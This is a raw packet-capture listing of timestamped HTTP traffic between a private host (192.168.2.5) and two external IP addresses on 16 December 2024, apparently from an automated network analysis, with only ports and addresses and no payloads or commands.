Dec 16, 2024 11:03:33.472492933 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.472517014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.472531080 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.472568989 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.472584009 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.472616911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.473237038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.473274946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.473293066 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.473318100 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.473325014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.473356009 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.473365068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.473512888 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.474621058 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.474677086 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.474678993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.474726915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.474735022 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.474771023 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.474787951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.474822044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.475358009 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.475393057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.475409031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.475428104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.475456953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.475462914 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.475477934 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.475513935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.475836039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.475869894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.475899935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.475904942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.475934982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.475943089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.475958109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.475994110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.476346970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.476403952 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.476403952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.476440907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.476454020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.476486921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.476511955 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.476567030 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.477185965 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.477221966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.477256060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.477256060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.477278948 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.477294922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.477312088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.477348089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.477972031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.478030920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.478046894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.478069067 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.478102922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.478105068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.478156090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.478728056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.478790998 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.478792906 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.478810072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.478847980 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.478863955 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.478884935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.478933096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.479556084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.479614973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.479631901 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.479650021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.479666948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.479691029 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.479715109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.480334997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.480364084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.480390072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.480391979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.480432034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.480448008 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.480469942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.480523109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.481122017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.481184959 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.481184959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.481203079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.481236935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.481259108 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.481268883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.481308937 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.481911898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.481966972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.481971979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.481990099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.482023954 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.482039928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.482069969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.482120991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.482701063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.482752085 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.482760906 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.482778072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.482805014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.482821941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.482834101 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.482877016 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.483490944 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.483550072 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.483558893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.483576059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.483611107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.483611107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.483632088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.483650923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.484289885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.484318018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.484333038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.484345913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.484361887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.484404087 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.484431982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.484474897 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.485085011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.485129118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.485148907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.485183001 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.485213041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.485234976 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.485264063 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.485896111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.485944986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.485986948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.486005068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.486023903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.486038923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.486059904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.486671925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.486701965 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.486720085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.486728907 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.486773014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.486872911 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.486926079 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.487576962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.487622976 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.487644911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.487652063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.487678051 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.487695932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.487746000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.487804890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.522927999 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.522975922 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.523030996 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.523050070 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.523072004 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.523098946 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.523197889 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.523264885 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.524588108 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.524661064 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.524681091 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.524718046 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.524738073 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.524782896 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.525207043 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.525264978 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.525582075 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.525613070 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.525643110 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.525648117 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.525670052 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.525696039 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.525728941 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.525783062 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.526103973 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.526159048 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.526160002 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.526194096 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.526402950 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.526495934 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.526571035 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.526705027 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.526742935 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.527807951 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.527923107 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.527975082 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.528302908 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.528356075 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.528407097 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.528434038 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.528697014 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.528723955 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.528776884 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.528806925 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.528840065 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.529016018 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.529043913 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.529071093 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.529122114 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.529149055 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.643474102 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.643517971 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.643553019 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.643579960 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.644889116 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.644932985 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.644959927 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.644996881 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.645654917 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.645699024 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.645757914 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.645786047 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.645956993 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.660305023 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.660377026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.660412073 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.660445929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.660480976 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.660515070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.660520077 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.660552979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.660584927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.660592079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.660621881 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.660646915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.660695076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.660732031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.660749912 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.660770893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.660779953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.660823107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.661442041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.661494970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.661530018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.661565065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.661653042 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.662214041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.662271023 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.662281990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.662312031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.662331104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.662348032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.662368059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.662406921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.662977934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.663033009 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.663038015 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.663069963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.663093090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.663122892 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.663139105 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.663199902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.663935900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.663991928 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.664010048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.664031029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.664045095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.664067984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.664082050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.664118052 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.664700985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.664760113 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.664761066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.664796114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.664820910 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.664830923 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.664845943 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.664880991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.665401936 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.665436983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.665462017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.665474892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.665487051 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.665512085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.665537119 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.665559053 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.666167021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.666202068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.666230917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.666235924 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.666255951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.666271925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.666291952 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.666321993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.666950941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.667005062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.667009115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.667046070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.667068005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.667090893 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.667117119 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.667171955 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.667759895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.667815924 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.667819023 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.667854071 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.667881966 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.667891026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.667910099 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.667948008 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.668526888 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.668582916 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.668602943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.668638945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.668656111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.668674946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.668690920 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.668725014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.669368982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.669404030 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.669426918 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.669440031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.669471025 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.669493914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.669513941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.669569016 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.670183897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.670241117 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.670254946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.670291901 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.670312881 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.670326948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.670342922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.670377970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.670927048 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.670962095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.670989990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.671000004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.671025991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.671037912 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.671051979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.671091080 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.671705008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.671762943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.671762943 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.671799898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.671821117 CET	49833	80	192.168.2.5	31.41.244.11
